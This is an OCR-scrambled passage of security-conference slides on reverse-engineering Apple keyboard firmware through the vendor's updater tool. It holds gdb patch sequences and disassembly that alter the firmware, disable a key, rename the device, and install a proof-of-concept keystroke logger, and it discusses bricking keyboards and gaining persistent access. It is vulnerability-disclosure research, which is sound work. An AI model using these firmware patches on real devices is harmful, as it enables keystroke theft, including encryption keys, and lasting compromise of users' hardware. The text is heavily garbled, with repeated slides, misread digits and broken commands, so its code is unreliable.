0x7c 
0x01 



Address = 0x40 (block size) * Oxc (block number) = 0x300. 



0300 


43 


32 00 


OR reg[32] 


0303 


55 


f8 00 


MOV [f8], 


0306 


55 


f9 00 


MOV [f9], 


0309 


50 


a3 


MOV A, a3 


030b 


4e 




SWAP A, SP 



(gdb) : 

0x64a8 
0x64b0 
0x64b8 
0x64c0 
0x64c8 



/38b 0x64a8 



0x00 

0x00 


0x0c 
0x55 


0x02 


0x80 



0xf9 0x00 0x50 



Oxff 0x50 0x00 OxOc 



Oxa3 


0x4e 


0x62 


0x90 


OxOb 


0x62 


0x7c 


0x03 


0xe3 


0x01 







Address = 0x40 (block size) * Oxc (block number) = 0x300. 



0300 


43 


32 


00 


OR reg[32] 


0303 


55 


f8 


00 


MOV [f8], 


0306 


55 


f9 


00 


MOV [f9], 


0309 


50 


a3 




MOV A, a3 


030b 


4e 






SWAP A, SP 


030c 


62 


02 


80 


MOV reg[02 



We want to alter last instruction. 



(gdb) : 

0x64a8 
0x64b0 
0x64b8 
0x64c0 
0x64c8 



/38b 0x64a8 



0x00 

0x00 


0x0c 
0x55 


0x02 


0x80 



0xf9 0x00 0x50 



Oxff 0x50 0x00 OxOc 



Oxa3 


0x4e 


0x62 


0x90 


OxOb 


0x62 


0x7c 


0x03 


0xe3 


0x01 







Address = 0x40 (block size) * Oxc (block number) = 0x300. 



0300 


43 


32 


00 


OR reg[32] 


0303 


55 


f8 


00 


MOV [f8], 


0306 


55 


f9 


00 


MOV [f9], 


0309 


50 


a3 




MOV A, a3 


030b 


4e 






SWAP A, SP 


030c 


62 


02 


80 


MOV reg[02 



We want to change 0x80 to 0x00. 



On the Cypress CY7C63310/638xx/639xx, 0xf8 and 0xf9 are 
important for the SSC (Supervisory System Call) instruction. 

• used to distinguish valid and accidental SSC calls 

• 0xf8 has to have 0x3a 

• 0xf9 must have the same value as the stack pointer when 
the supervisory read only memory (SROM) function 
executes 

Definitely not the case here. Let's go ahead and do the patch. 



Final checksum: 



• Recall that the final checksum was: 0x4e41b. 

• Now we're replacing 0x80 by 0x00 

• The new final checksum is: 0x4e39b. 

• So we need to replace 0xe41b by 0xe39b. 



A benign exploit. 



$ gdb -q HIDFirmwareUpdaterTool 
(gdb) tb *0x226a 
Breakpoint 1 at 0x226a 

(gdb) r -progress -pid 0x220 kbd_0x0069_0x0220 . : 
Breakpoint 1, 0x0000226a in ?? () 
(gdb) set {char}0x64b9 = 0x00 
(gdb) set { short } 0x845e = 0x9be3 
(gdb) c 



A benign exploit. 



$ gdb -q HIDFirmwareUpdaterTool 
(gdb) tb *0x226a 
Breakpoint 1 at 0x226a 

(gdb) r -progress -pid 0x220 kbd_0x0069_0x0220 . irrx 
Breakpoint 1, 0x0000226a in ?? () 
(gdb) set {char}0x64b9 = 0x00 
(gdb) set { short } 0x845e = 0x9be3 
(gdb) c 

Success! We've modified the firmware on the keyboard. 
Demo. 



A benign exploit. 



$ gdb -q HIDFirmwareUpdaterTool 

(gdb) tb *0x226a 
Breakpoint 1 at 0x226a 

(gdb) r -progress -pid 0x220 kbd_0x0069_0x0220 . irrxfw 
Breakpoint 1, 0x0000226a in ?? () 

(gdb) set {char}0x64b9 = 0x00 

(gdb) set { short } 0x845e = 0x9be3 

(gdb) c 

Success! We've modified the firmware on the keyboard. 

Demo. 

Although our firmware modification is harmless, an attacker is 
not going to be so kind. 



The MSB of [74] is used to keep track of whether the LED is 
supposed to be on or off. 



076c 


47 


06 


02 


TST [06] 


02 


076f 


aO 


06 




JZ 06 — 


-> 0776 


0771 


55 


74 


00 


MOV [74] 


00 


0774 


80 


04 




JMP 04 - 


— > 0779 


0776 


55 


74 


80 


MOV [74] 


80 


0779 


7f 






RET 





If we want, we can completely decouple the LED from the Caps 
Lock functionality. 



Now I will show that we can alter enumeration. 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x63e6 


0x04 


0x16 


0x03 


0x41 


0x00 


0x70 


0x00 


0x63ee 


0x00 


0x6c 


0x00 


0x65 


0x00 


0x2c 


0x00 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 





(gdb) x/38b 0x63d6 



0x63d6 


0x00 


0x09 


0x00 


0x00 
0x00 


Oxde 
Oxde 


0x00 
0x04 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x03 


0x63e6 


0x04 


0x16 


0x03 


0x41 


0x00 


0x70 


0x00 


0x63ee 


0x00 


0x6c 


0x00 


0x65 


0x00 


0x2c 


0x00 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x63e6 


0x04 


0x16 


0x03 


0x41 


0x00 


0x70 


0x00 


0x63ee 


0x00 


0x6c 


0x00 


0x65 


0x00 


0x2c 


0x00 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 

Supported language: 

bLength = 0x04 size of descriptor 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x63e6 


0x04 


0x16 


0x03 


0x41 


0x00 


0x70 


0x00 


0x63ee 


0x00 


0x6c 


0x00 


0x65 


0x00 


0x2c 


0x00 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Supported language: 



bLength = 0x04 size of descriptor 

bDescriptorType = 0x03 string descriptor 



(gdb) x/38b Ox 


63d6 














0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


Oxle 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x09 


0x63e6 


0x04 


0x16 


0x03 


0x41 


0x00 


0x70 


0x00 


0x70 


0x63ee 


0x00 


0x6c 


0x00 


0x65 


0x00 


0x2c 


0x00 


0x20 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 







Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Supported language: 

bLength = 0x04 size of descriptor 

bDescriptorType = 0x03 string descriptor 
wLANGID[0] = 0x0409 supported language (English - U.S.) 



(gdb) x/38b Ox 


63d6 














0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


Oxle 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x09 


0x63e6 


0x04 


0x16 


0x03 


0x41 


0x00 


0x70 


0x00 


0x70 


0x63ee 


0x00 


0x6c 


0x00 


0x65 


0x00 


0x2c 


0x00 


0x20 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 







Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Manufacturer String: 

bLength = 0x16 size of descriptor 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x63e6 


0x04 


0x16 


0x03 


0x41 


0x00 


0x70 


0x00 


0x63ee 


0x00 


0x6c 


0x00 


0x65 


0x00 


0x2c 


0x00 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Manufacturer String: 



bLength = 0x16 size of descriptor 

bDescriptorType = 0x03 string descriptor 



(gdb) x/38b Ox 


63d6 














0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


Oxle 


0x63de 


0x02 
0x04 
0x00 


0x64 
0x16 
0x6c 


0x00 
0x03 
0x00 


0x00 


Oxde 


0x04 
0x70 
0x2c 


0x03 
0x00 
0x00 


0x09 


0x63e6 


0x41 


0x00 


0x70 


0x63ee 


0x65 


0x00 


0x20 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 







Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Manufacturer String: 

bLength = 0x16 size of descriptor 

bDescriptorType = 0x03 string descriptor 
bString = A 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 
0x04 
0x00 


0x64 
0x16 
0x6c 


0x00 
0x03 
0x00 


0x00 
0x41 
0x65 


Oxde 
0x00 
0x00 


0x04 


0x03 


0x63e6 


0x70 


0x00 


0x63ee 


0x2c 


0x00 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Manufacturer String: 

bLength = 0x16 size of descriptor 

bDescriptorType = 0x03 string descriptor 
bString = Ap 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x63e6 


0x04 


0x16 


0x03 


0x41 


0x00 


0x70 


0x00 


0x63ee 


0x00 


0x6c 


0x00 


0x65 


0x00 


0x2c 


0x00 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Manufacturer String: 

bLength = 0x16 size of descriptor 

bDescriptorType = 0x03 string descriptor 
bString = App 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x63e6 


0x04 
0x00 
0x00 


0x16 


0x03 


0x41 
0x65 
0x00 


0x00 
0x00 
0x09 


0x70 
0x2c 
0x01 


0x00 


0x63ee 


0x6c 


0x00 


0x00 


0x63f6 


0x49 


0x00 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Manufacturer String: 

bLength = 0x16 size of descriptor 

bDescriptorType = 0x03 string descriptor 
bString = Appl 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x63e6 


0x04 
0x00 
0x00 


0x16 
0x6c 
0x49 


0x03 
0x00 
0x00 


0x41 


0x00 


0x70 
0x2c 
0x01 


0x00 


0x63ee 


0x65 


0x00 


0x00 


0x63f6 


0x00 


0x09 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Manufacturer String: 

bLength = 0x16 size of descriptor 

bDescriptorType = 0x03 string descriptor 
bString = Apple 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x63e6 


0x04 
0x00 
0x00 


0x16 
0x6c 
0x49 


0x03 
0x00 
0x00 


0x41 
0x65 
0x00 


0x00 
0x00 
0x09 


0x70 


0x00 


0x63ee 


0x2c 


0x00 


0x63f6 


0x01 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Manufacturer String: 

bLength = 0x16 size of descriptor 

bDescriptorType = 0x03 string descriptor 
bString = Apple, 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x63e6 


0x04 


0x16 


0x03 


0x41 


0x00 


0x70 


0x00 


0x63ee 


0x00 


0x6c 


0x00 


0x65 


0x00 


0x2c 


0x00 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Manufacturer String: 

bLength = 0x16 size of descriptor 

bDescriptorType = 0x03 string descriptor 
bString = Apple, 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x63e6 


0x04 


0x16 


0x03 


0x41 


0x00 


0x70 


0x00 


0x63ee 


0x00 
0x00 


0x6c 


0x00 


0x65 
0x00 


0x00 
0x09 


0x2c 
0x01 


0x00 


0x63f6 


0x49 


0x00 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Manufacturer String: 

bLength = 0x16 size of descriptor 

bDescriptorType = 0x03 string descriptor 
bString = Apple, I 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x63e6 


0x04 


0x16 


0x03 


0x41 


0x00 


0x70 


0x00 


0x63ee 


0x00 


0x6c 


0x00 


0x65 


0x00 


0x2c 


0x00 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Manufacturer String: 

bLength = 0x16 size of descriptor 

bDescriptorType = 0x03 string descriptor 
bString = Apple, Inc 



(gdb) x/38b Ox 


63d6 












0x63d6 


OxOO 


0x09 


0x00 


0x00 


Oxde 


0x00 


0x00 


0x63de 


0x02 


0x64 


0x00 


0x00 


Oxde 


0x04 


0x03 


0x63e6 


0x04 


0x16 


0x03 


0x41 


0x00 


0x70 


0x00 


0x63ee 


0x00 


0x6c 


0x00 


0x65 


0x00 


0x2c 


0x00 


0x63f6 


0x00 


0x49 


0x00 


0x00 


0x09 


0x01 





Address = 0x40 (block size) * 0x9 (block number) = 0x240. 
Manufacturer String: 

bLength = 0x16 size of descriptor 

bDescriptorType = 0x03 string descriptor 
bString = Apple, Inc 



We can change "Apple, Inc" to "Owned" for fun. 



Another benign exploit. 



$ gdb -q HIDFirmwareUpdaterTool 
(gdb) tb *0x226a 
Breakpoint 1 at 0x226a 

(gdb) r -progress -pid 0x220 kbd_0x0069_0x0220 . : 
' 



Breakpoint 


1, 0x0000226c 


(gdb) set 


{Char}0x63e7 = 


(gdb) set 


{char}0x63e9 = 


(gdb) set 


{char}0x63eb = 


(gdb) set 


{char}0x63ed = 


(gdb) set 


{char}0x63ef = 


(gdb) set 


{char}0x63fl = 


(gdb) set 


{short}0x845e 


(gdb) c 





Another benign exploit. 

$ gdb -q HIDFirmwareUpdaterTool 

(gdb) tb *0x226a 
Breakpoint 1 at 0x226a 

(gdb) r -progress -pid 0x220 kbd_0x0069_0x0220 . : 
Breakpoint 1, 0x0000226a in ?? () 



(gdb) 


set 


{Char}0x63e7 = 


0x0c 


(gdb) 


set 


{char}0x63e9 = 


0x4f 


(gdb) 


set 


{char}0x63eb = 


0x77 


(gdb) 


set 


{char}0x63ed = 


0x6e 


(gdb) 


set 


{char}0x63ef = 


0x65 


(gdb) 


set 


{char}0x63fl = 


0x64 


(gdb) 


set 


{short}0x845e 


= 0x1c 


(gdb) 


c 
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There is plenty of unused space in the firmware. 



E 



0x30 is the HALT instruction. 
Red = 0x30 , Blue = everything else. 
OxODFB to 0x1 2FF is all HALT instructions. 
More than 1 K of free space. 



Universal Serial Bus Specification Revision 2.0 




□ Hosl □ Fui 
re 8-38. Interrupt Transaction 



How do we intercept keystrokes typed by the user? 
How do we send our own keystrokes back to the host? 

• Easy! Modify callers of the routine that fills endpoint buffer 

• Keyboard uses interrupt IN endpoint 0x81 



Table 21 -6. E 


ndpoin 


1 Data (EP1DATA) [0x58-0x5F] [FWW] 










' I ! ^ I 

































http://datasheet.digchip.eom/1 1 5/1 1 5-1 531 2-CY7C6331 0.pdf 
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08 00 00 00 00 00 00 00 

08 00 2C 00 00 00 00 00 

00 00 2C 00 00 00 00 00 

00 00 00 00 00 00 00 00 

00 00 17 00 00 00 00 00 

00 00 00 00 00 00 00 00 



00 00 08 00 
00 00 00 00 



00 00 00 
00 00 00 



00 00 15 00 00 00 00 00 
00 00 00 00 00 00 00 00 



00 00 10 00 00 00 00 00 
00 00 00 00 00 00 00 00 



00 00 0C 00 00 00 00 00 
00 00 00 00 00 00 00 00 



00 00 11 00 00 00 00 00 
00 00 00 00 00 00 00 00 



00 00 04 00 00 00 00 00 
00 00 00 00 00 00 00 00 



00 00 OF 00 00 00 00 00 
00 00 00 00 00 00 00 00 



00 00 28 00 00 
00 00 00 00 00 



00 00 00 return 
00 00 00 



) is the key routine that copies stuff into endpoint buffers 

iments: X points to stuff to copy into endpoint buffer 



lefO 


3c 


32 03 


CMP [32], 


lef3 


dO 


3f 


JNC 3f 


lef5 


5a 


30 


MOV [30], } 


lef7 


51 


32 


MOV A, [32 


lef9 


fO 


39 


INDEX 3 9 


lefb 


5c 




MOV X, A 


lefc 


51 


33 


MOV A, [33 


lefe 


53 


31 


MOV [31], 1 


lfOO 


7a 


31 


DEC [31] 


lf02 


cO 


08 


JC 08 > 


lf04 
lf06 


3e 

61 


30 
00 


MVI A, [[3 
MOV reg[X+ 


lf08 


75 




INC X 


lf09 


8f 


f6 


JMP f6 



(50, 58, 60) 



mov x, [: 

MOV A, X 
INDEX 67 
AND A, [1 
JZ 03 --- 
MOV A, 8C 
OR A, [3: 
MOV reg[> 



5 6 2 7 MOV 



see le77 (01, ( 
[22] =2 if EP1 : 
4 if EP2 : 
set DATA1 
ByteCount [3:0] 
write endpoint 

put CPU flags : 



AND F, 








MOV reg 


X 


1-44 


, 


MOV A, 


eg[X 


44 


CMP A, 


d 






JNZ f8 




-> 


f2 


TST [30 


, 


01 




JZ 03 - 




> lf33 


OR F, 










kiwipulse.com/wp-content/uploads/2008/11/george-w-bush-leaves-office6.jpg 



• Before George W. Bush took office in 2000, Clinton staffers 
removed the W key from all computer keyboards in the 
White House 

• We can do this also, but in firmware 



0d51 gets called every time a key goes up/down 



MOV 


A, re 


AND 


A, Of 


CMP 


A, 0c 


JNZ 


le -- 


PUSH X 


LCALL 61 


POP 


X 


CMP 


A, 00 


JNZ 


15 — 


MOV 


[32], 


MOV 


[33], 


PUSH X 


MOV 


A, 00 


PUSI 


1 A 


MOV 


A, 65 


MOV 


X, A 


POP 


A 


LCALL lef 



get endpoint 1 mode 
0x0c = 1100 (NAK IN) 



Od51 


5d 


45 


MOV A, 


reg[45] 


Od53 


21 


Of 


AND A, 


Of 


Od55 


39 


Oc 


CMP A, 


Oc 


0d57 


bO 


le 


JNZ le 


— > 0d76 


1000 


30 




HALT 




1001 


30 




HALT 




1002 


30 




HALT 




1003 


30 




HALT 




1004 


30 




HALT 




1005 


30 




HALT 




1006 


30 




HALT 




1007 


30 




HALT 




1008 


30 




HALT 




1009 


30 




HALT 




100a 


30 




HALT 




100b 


30 




HALT 




100c 


30 




HALT 





Od51 


5d 


45 


MOV A, 


reg[45] 


0d5 


Od53 


21 


Of 


AND A, 


Of 




Od55 


39 


Oc 


CMP A, 


Oc 




0d57 


bO 


le 


JNZ le 


— > 0d76 




1000 


30 




HALT 






1001 


30 




HALT 






1002 


30 




HALT 






1003 


30 




HALT 






1004 


30 




HALT 






1005 


30 




HALT 






1006 


30 




HALT 






1007 


30 




HALT 






1008 


30 




HALT 






1009 


30 




HALT 






100a 


30 




HALT 






100b 


30 




HALT 






100c 


30 




HALT 







7d 10 00 LJMP 10 00 



Od51: 5d 45 MOV A, reg[45] 0d51 

0d53: 21 Of AND A, Of 

0d55: 39 Oc CMP A, Oc 

0d57: bO le JNZ le — > 0d76 



7d 10 00 LJMP 10 00 



1000: 
1001: 
1002: 
1003: 
1004: 
1005: 
1006: 
1007: 



HALT 
HALT 
HALT 
HALT 
HALT 
HALT 
HALT 
HALT 
HALT 
HALT 
HALT 
HALT 
HALT 



000 


3c 


67 


la 


CMP [67], la 


003 


bO 


04 




JNZ 04 — > 1008 


005 


55 


67 


00 


MOV [67], 00 


008 


5d 


45 




MOV A, reg[45] 


00a 


21 


Of 




AND A, Of 


00c 


39 


Oc 




CMP A, Oc 


OOe 


7d 


Od 


57 


LJMP Od 5 7 



Od51 


5d 


■15 


MOV A, 


reg[45] 


0d51 


Od53 


21 


Of 


AND A, 


Of 






Od55 


39 


Oc 


CMP A, 


Oc 






0d57 


bO 


le 


JNZ le 


— > 


0d76 




1000 


30 




HALT 






1000 


1001 


30 




HALT 






1003 


1002 


30 




HALT 






1005 


1003 


30 




HALT 






1008 


1004 


30 




HALT 






100a 


1005 


30 




HALT 






100c 


1006 


30 




HALT 






lOOe 


1007 


30 




HALT 








1008 


30 




HALT 








1009 


30 




HALT 








100a 


30 




HALT 








100b 


30 




HALT 








100c 


30 




HALT 









7d 10 00 LJMP 10 00 



55 67 00 
5d 45 



CMP [67], la 
JNZ 04 — > 1008 
MOV [67], 00 
MOV A, reg[45] 
AND A, Of 
CMP A, Oc 
LJMP Od 5 7 



This disables the 'w' key: 

$ gdb -q HIDFirmwareUpdaterTool 

(gdb) tb *0x226a 
Breakpoint 1 at 0x226a 

(gdb) r -progress -pid 0x220 kbd_0x0069_0x0220 . : 
Breakpoint 1, 0x0000226a in ?? () 



(gdb) 


set 


{Char}0x6ff2 = 


0x7d 


(gdb) 


set 


{char}0x6ff3 = 


0x10 


(gdb) 


set 


{char}0x6ff4 = 


0x00 


(gdb) 


set 


{int}0x72e3 = 


0xb01a673c 


(gdb) 


set 


{int}0x72e7 = 


0x00675504 


(gdb) 


set 


{int}0x72eb = 


0x0f21455d 


(gdb) 


set 


{int}0x72ef = 


0x0d7d0c39 


(gdb) 


set 


{char}0x72f3 = 


0x57 


(gdb) 


set 


{short}0x845e 


= 0xdae4 


(gdb) 


c 







This disables the 'w' key: 

$ gdb -q HIDFirmwareUpdaterTool 

(gdb) tb *0x226a 
Breakpoint 1 at 0x226a 

(gdb) r -progress -pid 0x220 kbd_0x0069_0x0220 . : 
Breakpoint 1, 0x0000226a in ?? () 



(gdb) 


set 


{Char}0x6ff2 = 


0x7d 


(gdb) 


set 


{char}0x6ff3 = 


0x10 


(gdb) 


set 


{char}0x6ff4 = 


0x00 


(gdb) 


set 


{int}0x72e3 = 


0xb01a673c 


(gdb) 


set 


{int}0x72e7 = 


0x00675504 


(gdb) 


set 


{int}0x72eb = 


0x0f21455d 


(gdb) 


set 


{int}0x72ef = 


0x0d7d0c39 


(gdb) 


set 


{char}0x72f3 = 


0x57 


(gdb) 


set 


{short}0x845e 


= 0xdae4 


(gdb) 


c 







We can also intercept the keystrokes and store them. 



1000: 
1003: 
1005: 
1006: 
1009: 
100b: 
lOOd: 
lOOf : 
1011: 
1012: 



CMP 


[67] 


00 


JZ 26 --- 


> 1 


PUSH X 




CMP 


[67] 


28 


JNZ 


11 — 




MOV 


A, reg[6 


CMP 


A, 00 


JZ 


4 — 


> 1 


DEC 


A 




MOV 


reg[61]. 


MOV 


X, A 




MOV 


A, reg[X 


MOV 


[67] 


A 


JMP 


Of — 





1021: 
1022: 
1024: 
1025: 
1027: 
1029: 



7d Od 57 



MOV 


A, 


reg[61 


CMP 


A, 


06 


JZ 


9 


> 10 


INC 


A 




MOV 


re 


g[61]. 


MOV 


x, 


A 


MOV 


A, 


[67] 


MOV 


re 


g[X+62] 


POP 


X 




MOV 


A, 


reg[45 


AND 


A, 


Of 


CMP 


A, 


0c 


LJMP 


d 57 



A firmware keystroke logger: 



$ gdb -q HIDFirmwareUpdaterTool 
(gdb) tb *0x226a 
Breakpoint 1 at 0x226a 

(gdb) r -progress -pid 0x220 kbd_0x0069_0x0220 . : 
Breakpoint 1, 0x0000226a in ?? () 



(gdb) 


set 


Char}0x64b8 = 


0x61 


(gdb) 


set 


char}0x64b9 = 


0x00 


(gdb) 


set 


char}0x6ff2 = 


0x7d 


(gdb) 


set 


char}0x6ff3 = 


0x10 


(gdb) 


set 


Char}0x6ff4 = 


0x00 


(gdb) 


set 


int}0x72e3 = 


0xa000673c 


(gdb) 


set 


int}0x72e7 = 


0x673cl026 


(gdb) 


set 


int}0x72eb = 


0x5dllb028 


(gdb) 


set 


int}0x72ef = 


0xa0003961 


(gdb) 


set 


int}0x72f3 = 


0x61607804 



(gdb) 


set { 


L nt}0x72f7 = 


0x53625e5c 


(gdb) 


set { 


L nt}0x72fb = 


0x5d0f8067 


(gdb) 


set { 


L nt}0x72ff = 


0xa0063961 


(gdb) 


set { 


L nt}0x7306 = 


0x61607409 


(gdb) 


set { 


L nt}0x730a = 


0x6167515c 


(gdb) 


set { 


Lnt}0x730e = 


0x455d2062 


(gdb) 


set { 


L nt}0x7312 = 


0x0c390f21 


(gdb) 


set { 


;har}0x7316 = 


0x7d 


(gdb) 


set { 


;har}0x7317 = 


OxOd 


(gdb) 


set { 


;har}0x7318 = 


0x57 


(gdb) 




3 hort}0x845e 


= 0x3ce9 


(gdb) 


c 







(gdb) 


set { 


L nt}0x72f7 = 


0x53625e5c 


(gdb) 


set { 


L nt}0x72fb = 


0x5d0f8067 


(gdb) 


set { 


L nt}0x72ff = 


0xa0063961 


(gdb) 


set { 


L nt}0x7306 = 


0x61607409 


(gdb) 


set { 


L nt}0x730a = 


0x6167515c 


(gdb) 


set { 


Lnt}0x730e = 


0x455d2062 


(gdb) 


set { 


L nt}0x7312 = 


0x0c390f21 


(gdb) 


set { 


;har}0x7316 = 


0x7d 


(gdb) 


set { 


;har}0x7317 = 


OxOd 


(gdb) 


set { 


;har}0x7318 = 


0x57 


(gdb) 




3 hort}0x845e 


= 0x3ce9 


(gdb) 


c 







Proof-of-concept keystroke logger: 



• Deliberately neutered 

• Have to use the Return key to retrieve stored keystrokes 

• Can only store a small handful of keystrokes 



Proof-of-concept keystroke logger: 

• Deliberately neutered 

• Have to use the Return key to retrieve stored keystrokes 

• Can only store a small handful of keystrokes 
But: 

• A logger that can store a couple dozen keystrokes in RAM 
can be written without difficulty 

• Could also write intercepted keystrokes to flash and store 
more than 1000 keystrokes 

• Could be used for stealing a full-disk encryption key 



Do we need physical access to retrieve data from a keyboard? 



• No, see Blaze et al.'s paper in USENIX Security 2006. 

• They use timing delays 

• Data is exfiltrated over interactive protocols: ssh, vnc, etc. 



Don't use Apple keyboards in your data center 
• Shared hosting can be attacked via an Apple keyboard 



What about Mac Book/Mac Book Pro keyboards? 



What about MacBook/MacBook Pro keyboards? 



I MacBook, MacBook Pro Keyboard Firmware Update 1.0 




http://www.flickr.com/photos/gabrielescotto/3195943331/ 



Denial of service: 



• It is very easy to brick a keyboard by interrupting the 
bootloader during firmware re-programming. 

• However, a keyboard bricked in this way can generally be 
unbricked by reflashing to 0x69 firmware. 



Denial of service: 

• It is very easy to brick a keyboard by interrupting the 
bootloader during firmware re-programming. 

• However, a keyboard bricked in this way can generally be 
unbricked by reflashing to 0x69 firmware. 

Instead of: 



(gdb) 
do: 



iid 0x220 kbd_0x0069_0x0220.: 



-pid 0x228 kbd_0x0069_0x0220.: 



A keyboard can also be intentionally bricked: 



• With a single well-placed jump, we can completely brick a 
keyboard 

• Can be done so that the keyboard cannot be re-flashed 

• I will not be releasing code for this, but will give a demo to 
any member of the press on request (BYOK) 



Why Apple needs to fix this vulnerability ASAP: 



• Some miscreant with a Safari 0-day decides to set up a 
webpage that bricks Mac keyboards 

• Particularly devastating for laptop computers 

• a "Chernobyl/CIH" for Macs, if you will 



Why Apple needs to fix this vulnerability ASAP: 

• Some miscreant with a Safari 0-day decides to set up a 
webpage that bricks Mac keyboards 

• Particularly devastating for laptop computers 

• a "Chernobyl/CIH" for Macs, if you will 

In addition, an attacker can: 



• install malicious code, disable the firmware update 
mechanism and have permanent access 



Special thanks to: 



• Ben FrantzDale (benfrantzdale.livejournal.com) 
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• Scott Moulton (MyHardDriveDied.com) 

• Nathan Rittenhouse (MIT) 
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• http://mprotect.blogspot.com 
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